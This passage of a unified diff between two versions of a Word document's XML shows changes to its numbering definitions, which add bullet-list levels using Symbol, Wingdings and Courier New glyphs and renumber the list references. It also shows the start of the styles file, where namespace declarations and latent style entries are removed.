+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5760"/>
+        </w:tabs>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="6480"/>
+        </w:tabs>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="18">
     <w:nsid w:val="6C455952"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="E2289AEA"/>
@@ -4106,7 +5062,305 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="16" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="19">
+    <w:nsid w:val="728763D6"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="BD108724"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="4320"/>
+        </w:tabs>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5040"/>
+        </w:tabs>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5760"/>
+        </w:tabs>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="6480"/>
+        </w:tabs>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="20">
+    <w:nsid w:val="7C935C3D"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="A4A82DC2"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="4320"/>
+        </w:tabs>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5040"/>
+        </w:tabs>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5760"/>
+        </w:tabs>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="6480"/>
+        </w:tabs>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="21">
     <w:nsid w:val="7CAD4504"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="C276E16C"/>
@@ -4219,7 +5473,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="17" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="22">
     <w:nsid w:val="7FE24A29"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="9D0EA1D0"/>
@@ -4368,65 +5622,80 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:num w:numId="1" w16cid:durableId="555548818">
-    <w:abstractNumId w:val="11"/>
+  <w:num w:numId="1">
+    <w:abstractNumId w:val="13"/>
   </w:num>
-  <w:num w:numId="2" w16cid:durableId="627122921">
+  <w:num w:numId="2">
+    <w:abstractNumId w:val="7"/>
+  </w:num>
+  <w:num w:numId="3">
+    <w:abstractNumId w:val="18"/>
+  </w:num>
+  <w:num w:numId="4">
+    <w:abstractNumId w:val="3"/>
+  </w:num>
+  <w:num w:numId="5">
     <w:abstractNumId w:val="6"/>
   </w:num>
-  <w:num w:numId="3" w16cid:durableId="1185054455">
+  <w:num w:numId="6">
+    <w:abstractNumId w:val="10"/>
+  </w:num>
+  <w:num w:numId="7">
+    <w:abstractNumId w:val="21"/>
+  </w:num>
+  <w:num w:numId="8">
+    <w:abstractNumId w:val="2"/>
+  </w:num>
+  <w:num w:numId="9">
+    <w:abstractNumId w:val="0"/>
+  </w:num>
+  <w:num w:numId="10">
+    <w:abstractNumId w:val="14"/>
+  </w:num>
+  <w:num w:numId="11">
+    <w:abstractNumId w:val="8"/>
+  </w:num>
+  <w:num w:numId="12">
     <w:abstractNumId w:val="15"/>
   </w:num>
-  <w:num w:numId="4" w16cid:durableId="1347058880">
-    <w:abstractNumId w:val="3"/>
-  </w:num>
-  <w:num w:numId="5" w16cid:durableId="1061948280">
+  <w:num w:numId="13">
     <w:abstractNumId w:val="5"/>
   </w:num>
-  <w:num w:numId="6" w16cid:durableId="600142131">
+  <w:num w:numId="14">
+    <w:abstractNumId w:val="1"/>
+  </w:num>
+  <w:num w:numId="15">
+    <w:abstractNumId w:val="22"/>
+  </w:num>
+  <w:num w:numId="16">
+    <w:abstractNumId w:val="16"/>
+  </w:num>
+  <w:num w:numId="17">
+    <w:abstractNumId w:val="12"/>
+  </w:num>
+  <w:num w:numId="18">
     <w:abstractNumId w:val="9"/>
   </w:num>
-  <w:num w:numId="7" w16cid:durableId="972371544">
-    <w:abstractNumId w:val="16"/>
-  </w:num>
-  <w:num w:numId="8" w16cid:durableId="911233586">
-    <w:abstractNumId w:val="2"/>
-  </w:num>
-  <w:num w:numId="9" w16cid:durableId="1757821947">
-    <w:abstractNumId w:val="0"/>
-  </w:num>
-  <w:num w:numId="10" w16cid:durableId="105003285">
-    <w:abstractNumId w:val="12"/>
-  </w:num>
-  <w:num w:numId="11" w16cid:durableId="956839718">
-    <w:abstractNumId w:val="7"/>
-  </w:num>
-  <w:num w:numId="12" w16cid:durableId="986281708">
-    <w:abstractNumId w:val="13"/>
-  </w:num>
-  <w:num w:numId="13" w16cid:durableId="937326636">
+  <w:num w:numId="19">
     <w:abstractNumId w:val="4"/>
   </w:num>
-  <w:num w:numId="14" w16cid:durableId="1990746254">
-    <w:abstractNumId w:val="1"/>
+  <w:num w:numId="20">
+    <w:abstractNumId w:val="19"/>
   </w:num>
-  <w:num w:numId="15" w16cid:durableId="474640033">
+  <w:num w:numId="21">
+    <w:abstractNumId w:val="20"/>
+  </w:num>
+  <w:num w:numId="22">
     <w:abstractNumId w:val="17"/>
   </w:num>
-  <w:num w:numId="16" w16cid:durableId="2029021602">
-    <w:abstractNumId w:val="14"/>
-  </w:num>
-  <w:num w:numId="17" w16cid:durableId="954557924">
-    <w:abstractNumId w:val="10"/>
-  </w:num>
-  <w:num w:numId="18" w16cid:durableId="469597505">
-    <w:abstractNumId w:val="8"/>
+  <w:num w:numId="23">
+    <w:abstractNumId w:val="11"/>
   </w:num>
 </w:numbering>
 </file>
 
 <file path=word/styles.xml><?xml version="1.0" encoding="utf-8"?>
-<w:styles xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du">
+<w:styles xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
   <w:docDefaults>
     <w:rPrDefault>
       <w:rPr>
@@ -4435,7 +5704,6 @@
         <w:sz w:val="24"/>
         <w:szCs w:val="24"/>
         <w:lang w:val="es-ES" w:eastAsia="en-US" w:bidi="ar-SA"/>
-        <w14:ligatures w14:val="standardContextual"/>
       </w:rPr>
     </w:rPrDefault>
     <w:pPrDefault>
@@ -4444,387 +5712,149 @@
       </w:pPr>
     </w:pPrDefault>
   </w:docDefaults>
-  <w:latentStyles w:defLockedState="0" w:defUIPriority="99" w:defSemiHidden="0" w:defUnhideWhenUsed="0" w:defQFormat="0" w:count="376">
-    <w:lsdException w:name="Normal" w:uiPriority="0" w:qFormat="1"/>
-    <w:lsdException w:name="heading 1" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="heading 2" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 3" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 4" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 5" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 6" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 7" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 8" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 9" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="index 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="index 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="index 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="index 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="index 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="index 6" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="index 7" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="index 8" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="index 9" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 1" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 2" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 3" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 4" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 5" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 6" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 7" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 8" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 9" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Normal Indent" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="footnote text" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="annotation text" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="header" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="footer" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="index heading" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="caption" w:semiHidden="1" w:uiPriority="35" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="table of figures" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="envelope address" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="envelope return" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="footnote reference" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="annotation reference" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="line number" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="page number" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="endnote reference" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="endnote text" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="table of authorities" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="macro" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toa heading" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Bullet" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Number" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Bullet 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Bullet 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Bullet 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Bullet 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Number 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Number 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Number 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Number 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Title" w:uiPriority="10" w:qFormat="1"/>
-    <w:lsdException w:name="Closing" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Signature" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Default Paragraph Font" w:semiHidden="1" w:uiPriority="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Body Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Body Text Indent" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Continue" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Continue 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Continue 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Continue 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Continue 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Message Header" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Subtitle" w:uiPriority="11" w:qFormat="1"/>
-    <w:lsdException w:name="Salutation" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Date" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Body Text First Indent" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Body Text First Indent 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Note Heading" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Body Text 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Body Text 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Body Text Indent 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Body Text Indent 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Block Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Hyperlink" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="FollowedHyperlink" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Strong" w:uiPriority="22" w:qFormat="1"/>
-    <w:lsdException w:name="Emphasis" w:uiPriority="20" w:qFormat="1"/>
-    <w:lsdException w:name="Document Map" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Plain Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="E-mail Signature" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Top of Form" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Bottom of Form" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Normal (Web)" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Acronym" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Address" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Cite" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Code" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Definition" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Keyboard" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Preformatted" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Sample" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Typewriter" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Variable" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Normal Table" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="annotation subject" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="No List" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Outline List 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Outline List 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Outline List 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Simple 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Simple 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Simple 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Classic 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Classic 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Classic 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Classic 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Colorful 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Colorful 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Colorful 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Columns 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Columns 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Columns 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Columns 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Columns 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Grid 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Grid 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
